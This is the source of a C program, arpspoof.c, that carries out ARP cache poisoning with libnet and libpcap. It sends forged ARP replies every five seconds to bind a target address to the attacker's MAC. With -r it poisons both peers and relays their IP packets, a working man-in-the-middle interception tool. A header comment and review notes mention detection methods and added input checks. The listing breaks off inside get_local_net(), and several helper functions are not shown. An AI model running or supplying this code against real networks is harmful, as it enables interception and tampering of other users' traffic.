📄 arpspoof.c
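/*
 * arpspoof.c - ARP cache poisoning with optional traffic relay.
 *
 * What the visible code does:
 *   - sends an ARP request (op 1) for the address given with -d and calls
 *     get_dst_mac() (defined outside this listing) to learn its MAC;
 *   - for every ARP request that asks for that address, forks a child that
 *     sends the requester an ARP reply (op 2) binding the address to this
 *     host's MAC, repeated every 5 seconds;
 *   - with -r, a second child sends such replies to both peers, and IP frames
 *     that arrive for this host's MAC are handed to forward_packet() with the
 *     real peer's MAC.
 *
 * On the wire this is a steady stream of unsolicited ARP replies in which one
 * MAC claims an IPv4 address that a different MAC answered for earlier. ARP
 * monitoring, static ARP entries and switch-side dynamic ARP inspection are
 * the usual ways to detect or block it.
 */
#include "/usr/include/libnet.h"
#include <pcap.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/if_ether.h>
#include <string.h>

/*
 * Minimum captured lengths required before the fixed-offset accessors
 * (get_tpa(), get_ipdst(), ...) are applied to a frame. The accessors are not
 * visible in this listing; the values assume standard Ethernet II layouts.
 */
enum {
    MIN_ARP_FRAME_LEN = 42, /* 14-byte Ethernet header + 28-byte IPv4 ARP body */
    MIN_IP_FRAME_LEN = 34   /* 14-byte Ethernet header + 20-byte IPv4 header */
};

u_char local_mac[6];
u_char local_ip[4];
u_char dst_mac[6];
u_char dst_ip[4];
u_char str_dst_ip[20];
u_char broad[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
int redirect = 0; /* whether to redirect (set by -r) */

int get_cmdline(int argc, char *argv[]);
int get_local_net(char *device);
int arpsend(char *device, u_char *arp_spa, u_char *arp_sha, u_char *arp_tpa,
            u_char *arp_tha, u_char *dst, u_short op);
int forward_packet(char *device, u_char *src_mac, u_char *dst_mac, u_char *packet);
u_char *get_spa(u_char *p);
u_char *get_tpa(u_char *p);
u_char *get_sha(u_char *p);
u_char *get_ipdst(u_char *p);
int get_arp_op(u_char *p);
int get_ether_type(u_char *p);
int test_ip(u_char *ip1, u_char *ip2);
int get_dst_mac(pcap_t *pt, struct pcap_pkthdr *hd);
u_char *get_ether_shost(u_char *p);
u_char *get_ether_dhost(u_char *p);
int test_mac(u_char *mac1, u_char *mac2);

/*
 * Entry point: parse options, open a non-promiscuous capture filtered to
 * "arp" on the default device, then loop forever reacting to ARP requests
 * whose target protocol address equals dst_ip.
 *
 * Returns -1 on any setup failure; otherwise it never returns.
 */
int main(int argc, char *argv[])
{
    u_char *packet;
    char errbuf[PCAP_ERRBUF_SIZE]; /* sized for the pcap calls that fill it */
    char filter_str[100] = "arp";
    struct bpf_program fp;         /* compiled capture filter */
    char *dev;
    pcap_t *descr;
    struct pcap_pkthdr hdr;
    bpf_u_int32 maskp;             /* subnet mask */
    bpf_u_int32 netp;              /* network address */
    int promisc = 0;               /* capture is opened non-promiscuous */
    int pcap_time_out = 5;         /* read timeout, milliseconds */

    if (get_cmdline(argc, argv) != 1) {
        return -1;
    }

    dev = pcap_lookupdev(errbuf);
    if (dev == NULL) {
        fprintf(stderr, "%s\n", errbuf);
        return -1;
    }
    if (pcap_lookupnet(dev, &netp, &maskp, errbuf) == -1) {
        fprintf(stderr, "%s\n", errbuf);
        return -1;
    }
    descr = pcap_open_live(dev, BUFSIZ, promisc, pcap_time_out, errbuf);
    if (descr == NULL) {
        printf("pcap_open_live(): %s\n", errbuf);
        return -1;
    }
    if (pcap_compile(descr, &fp, filter_str, 0, netp) == -1) {
        printf("Error calling pcap_compile\n");
        return -1;
    }
    if (pcap_setfilter(descr, &fp) == -1) {
        printf("Error setting filter\n");
        return -1;
    }

    get_local_net(dev);
    printf("local host :%d.%d.%d.%d->", local_ip[0], local_ip[1], local_ip[2], local_ip[3]);
    printf("%x;%x:%x:%x;%x;%x\n", local_mac[0], local_mac[1], local_mac[2],
           local_mac[3], local_mac[4], local_mac[5]);

    /* Broadcast an ARP request for dst_ip so that its MAC can be learned. */
    if (arpsend(dev, local_ip, local_mac, dst_ip, dst_mac, broad, 1) == -1) {
        printf("send arp request packet failed\n");
        exit(EXIT_FAILURE);
    }
    get_dst_mac(descr, &hdr);
    printf("destnation host:%d.%d.%d.%d->", dst_ip[0], dst_ip[1], dst_ip[2], dst_ip[3]);
    printf("%x;%x:%x:%x;%x;%x\n", dst_mac[0], dst_mac[1], dst_mac[2],
           dst_mac[3], dst_mac[4], dst_mac[5]);
    printf("listen the arp request to %d.%d.%d.%d\n", dst_ip[0], dst_ip[1], dst_ip[2], dst_ip[3]);
    printf("start......\n");

    for (;;) {
        pid_t worker;

        packet = (u_char *)pcap_next(descr, &hdr);
        /*
         * pcap_next() returns NULL on timeout, so the pointer must be tested
         * before any accessor touches it (the original tested it last, after
         * get_tpa()/get_arp_op() had already been called on it). Frames are
         * untrusted input: also require the full ARP body to be captured.
         */
        if (packet == NULL || hdr.caplen < MIN_ARP_FRAME_LEN) {
            continue;
        }
        if (test_ip(get_tpa(packet), dst_ip) == 0 || get_arp_op(packet) != 1) {
            continue;
        }

        /*
         * NOTE(review): one child is forked per matching request, with no
         * de-duplication of requesters and no reaping of exited children, so
         * the number of processes is unbounded.
         */
        worker = fork();
        if (worker == -1) {
            perror("fork");
            continue;
        }
        if (worker == 0) {
            u_char v_mac[6];
            u_char v_ip[4];
            char str_v_ip[20];
            pid_t poisoner;
            pcap_t *fwp;
            u_char *fpacket;
            struct pcap_pkthdr fwh;

            /* Copy out of the capture buffer instead of keeping pointers into it. */
            memcpy(v_ip, get_spa(packet), sizeof v_ip);
            memcpy(v_mac, get_sha(packet), sizeof v_mac);
            snprintf(str_v_ip, sizeof str_v_ip, "%d.%d.%d.%d",
                     v_ip[0], v_ip[1], v_ip[2], v_ip[3]);
            printf("get arp request from %sto %s\n", str_v_ip, (char *)str_dst_ip);

            if (redirect == 0) {
                /* One-way mode: this loop never exits except on send failure. */
                for (;;) {
                    printf("send spoof arp request to %s\n", str_v_ip);
                    if (arpsend(dev, dst_ip, local_mac, v_ip, v_mac, v_mac, 2) == -1) {
                        printf("send spoof arp reply error\n");
                        exit(EXIT_FAILURE);
                    }
                    sleep(5);
                }
            }

            /* Redirect mode: a second child keeps both peers' caches updated. */
            poisoner = fork();
            if (poisoner == -1) {
                perror("fork");
                exit(EXIT_FAILURE);
            }
            if (poisoner == 0) {
                for (;;) {
                    printf("send spoof arp request to %s\n", str_v_ip);
                    if (arpsend(dev, dst_ip, local_mac, v_ip, v_mac, v_mac, 2) == -1) {
                        printf("send spoof arp reply error\n");
                        exit(EXIT_FAILURE);
                    }
                    printf("send spoof arp request to %s\n", (char *)str_dst_ip);
                    if (arpsend(dev, v_ip, local_mac, dst_ip, dst_mac, dst_mac, 2) == -1) {
                        printf("send spoof arp reply error\n");
                        exit(EXIT_FAILURE);
                    }
                    sleep(5);
                }
            }

            fwp = pcap_open_live(dev, BUFSIZ, promisc, pcap_time_out, errbuf);
            if (fwp == NULL) {
                printf("pcap_open_live(): %s\n", errbuf);
                return -1;
            }
            /*
             * The original carried a disabled "src <requester>" BPF filter and
             * a disabled source-MAC check at this point; with both off, every
             * IP frame addressed to local_mac is examined below.
             */
            for (;;) {
                u_char *d;

                fpacket = (u_char *)pcap_next(fwp, &fwh);
                /* Require a complete Ethernet + IPv4 header before parsing. */
                if (fpacket == NULL || fwh.caplen < MIN_IP_FRAME_LEN) {
                    continue;
                }
                if (get_ether_type(fpacket) != ETHERTYPE_IP) {
                    continue;
                }
                if (test_mac(get_ether_dhost(fpacket), local_mac) == 0) {
                    continue;
                }

                /*
                 * NOTE(review): forward_packet() is given no length. It is not
                 * visible here; whatever size it derives from the IP header
                 * should be bounded by fwh.caplen - confirm in its definition.
                 */
                d = get_ipdst(fpacket);
                if (test_ip(d, dst_ip) == 1) {
                    if (forward_packet(dev, local_mac, dst_mac, fpacket) == 1) {
                        printf("forward a packet from %s to %d.%d.%d.%d\n",
                               str_v_ip, d[0], d[1], d[2], d[3]);
                    }
                }
                if (test_ip(d, v_ip) == 1) {
                    if (forward_packet(dev, local_mac, v_mac, fpacket) == 1) {
                        printf("forward a packet from %sto %d.%d.%d.%d\n",
                               (char *)str_dst_ip, d[0], d[1], d[2], d[3]);
                    }
                }
            }
        } /* child */
    } /* capture loop */
}

/*
 * Parse the command line.
 *   -d ipaddr  address stored in dst_ip (network byte order) and, as text,
 *              in str_dst_ip
 *   -r         set redirect
 *   -h         print usage
 *
 * Returns 1 on success, -1 when the -d argument is not a usable address.
 */
int get_cmdline(int argc, char *argv[])
{
    int c; /* getopt() returns int; a plain char may never compare equal to -1 */

    while ((c = getopt(argc, argv, "d:rh")) != -1) {
        if (c == 'd') {
            in_addr_t addr = inet_addr(optarg);

            /*
             * optarg is attacker-length input going into a 20-byte global:
             * reject anything that does not parse or does not fit, instead of
             * the original unbounded strcpy().
             */
            if (addr == INADDR_NONE || strlen(optarg) >= sizeof str_dst_ip) {
                fprintf(stderr, "invalid -d address\n");
                return -1;
            }
            /* memcpy avoids the misaligned/aliasing store through a cast. */
            memcpy(dst_ip, &addr, sizeof dst_ip);
            snprintf((char *)str_dst_ip, sizeof str_dst_ip, "%s", optarg);
        }
        if (c == 'r') {
            redirect = 1;
        }
        if (c == 'h') {
            printf("usage:-d ipaddr\n");
        }
    }
    return 1;
}

//get local host's mac address and ip address
int get_local_net(char * dev)
{
    int fd, intrface, retn = 0;
    int i;
    struct ifreq buf[15];
    struct arpreq arp;
    struct ifconf ifc;

    if ((fd = socket(AF_INET, SOCK_DGRAM, 0)) >= 0) {
        ifc.ifc_len = sizeof buf;
        ifc.ifc_buf = (caddr_t) buf;
        if (!ioctl(fd, SIOCGIFCONF, (char *) &ifc)) {
            intrface = ifc.ifc_len / sizeof(struct ifreq);
            while (intrface-- > 0) {
                if(strcmp(buf[intrface].ifr_name,dev)!=0) continue;
                printf(" device: %s\n", buf[intrface].ifr_name);
                //get ip address
                if (!(ioctl(fd, SIOCGIFADDR, (char *) &buf[intrface]))) {
                    *(unsigned int*)local_ip=(unsigned int )inet_addr(inet_ntoa(((struct sockaddr_in *) (&buf[intrface].ifr_addr))->sin_addr));
                } else {
                    char str[256];
                    sprintf(str, "cpm: ioctl device %s", buf[intrface].ifr_name);
                    perror(str);
                }
                //Get HW ADDRES of the net card
                if (!(ioctl(fd, SIOCGIFHWADDR, (char *) &buf[intrface]))) {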